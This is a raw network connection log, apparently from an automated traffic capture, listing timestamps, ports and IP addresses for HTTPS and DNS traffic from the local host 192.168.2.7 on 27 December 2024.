                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:14.117875099 CET49952443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:14.117880106 CET44349952188.245.216.205192.168.2.7
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.572253942 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.678334951 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.678425074 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.679253101 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.679513931 CET5187453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.679994106 CET5173853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.680871964 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.686064959 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.686084032 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.686352968 CET5827553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.686678886 CET4962053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.686762094 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.688755989 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.730914116 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.742521048 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.816265106 CET53518741.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.817209005 CET53517381.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.818722963 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.822680950 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.822756052 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.822767019 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.822776079 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.823031902 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.823148012 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.823237896 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.826353073 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.827157974 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.827301979 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.827461004 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.827735901 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.827800989 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.827811956 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.827970028 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.836874008 CET56390443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.847578049 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.848184109 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.848540068 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.848959923 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.849113941 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.850889921 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.992476940 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.992492914 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.993030071 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.994575024 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.999408007 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.999419928 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.999830008 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.001919985 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.002747059 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.003221989 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.045469999 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.048129082 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.057112932 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.071329117 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.071682930 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.132776022 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.133488894 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.136298895 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.136514902 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.137849092 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.138153076 CET56390443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.138292074 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.138556957 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.138658047 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.138721943 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.138837099 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.139061928 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.139298916 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.142592907 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.142766953 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.143686056 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.143686056 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.456962109 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.457534075 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.457941055 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.458116055 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.458369017 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.459203005 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.461379051 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.461585045 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.467389107 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:33.467586040 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.558116913 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.558281898 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.566282034 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.571259975 CET4435773323.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.571274042 CET4435773323.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.571363926 CET4435773323.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.571377993 CET4435773323.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.571389914 CET4435773323.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.571546078 CET57733443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.571686983 CET57733443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.575020075 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.575182915 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.583566904 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.591887951 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.592081070 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.601650953 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.601897001 CET57733443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.607295036 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.609620094 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.609761953 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.618205070 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.626782894 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.626982927 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.635425091 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.640144110 CET4435773323.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.644857883 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.645032883 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.653599024 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.661093950 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.661271095 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.670773029 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.679275036 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.679560900 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.687684059 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.696696043 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.696863890 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.704236031 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.713876009 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.714152098 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.722572088 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.730989933 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.731231928 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.739561081 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.748811960 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.749015093 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.757381916 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.765877008 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.766064882 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.775012970 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.783159018 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.783344030 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.797346115 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.812796116 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.812990904 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.815613031 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.818527937 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.818958998 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.821619034 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.826157093 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.835879087 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.836049080 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.843163013 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.852788925 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.853106976 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.863795042 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.886230946 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.886663914 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.887295961 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.889309883 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.889589071 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.895746946 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.904964924 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.907615900 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.913513899 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.921761990 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.922035933 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.930546045 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.940165997 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.940385103 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.948251009 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.957726955 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.402393103 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.403548956 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.404582977 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.448682070 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.448781013 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.519294977 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.703634977 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.704164982 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.705050945 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.705599070 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.705801964 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.725215912 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.730926037 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.731240034 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.731257915 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.731287003 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.731359005 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.731476068 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.731583118 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.731647968 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.731661081 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.731791019 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.731802940 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.731815100 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.731827974 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.731934071 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.731936932 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.731952906 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.731962919 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.731972933 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.731981993 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.737250090 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.737353086 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.737611055 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.737864017 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.737874985 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.737884998 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.742134094 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.742304087 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.742346048 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.742357969 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.742387056 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.742603064 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.747845888 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.748116970 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.748167992 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.748168945 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.748183012 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.748307943 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.748320103 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.748331070 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.748339891 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.749130964 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.762789965 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.763298988 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.763535023 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.763938904 CET44352335172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.768315077 CET57733443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.789650917 CET52335443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.060941935 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.081511974 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.081523895 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.089643002 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.089999914 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.090187073 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.090255976 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.090267897 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.090356112 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.090467930 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.090480089 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.090491056 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.090504885 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.090631962 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.090648890 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.090658903 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.091432095 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.091711998 CET4435773323.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.120157003 CET4435773323.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.120170116 CET4435773323.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.120240927 CET4435773323.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.120251894 CET4435773323.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:43.250713110 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:43.250725031 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:43.250900030 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:43.250911951 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:43.251014948 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:43.251296997 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:43.267049074 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:43.267062902 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:43.267074108 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:43.267160892 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:43.267174006 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:43.267303944 CET4435307123.209.72.21192.168.2.7
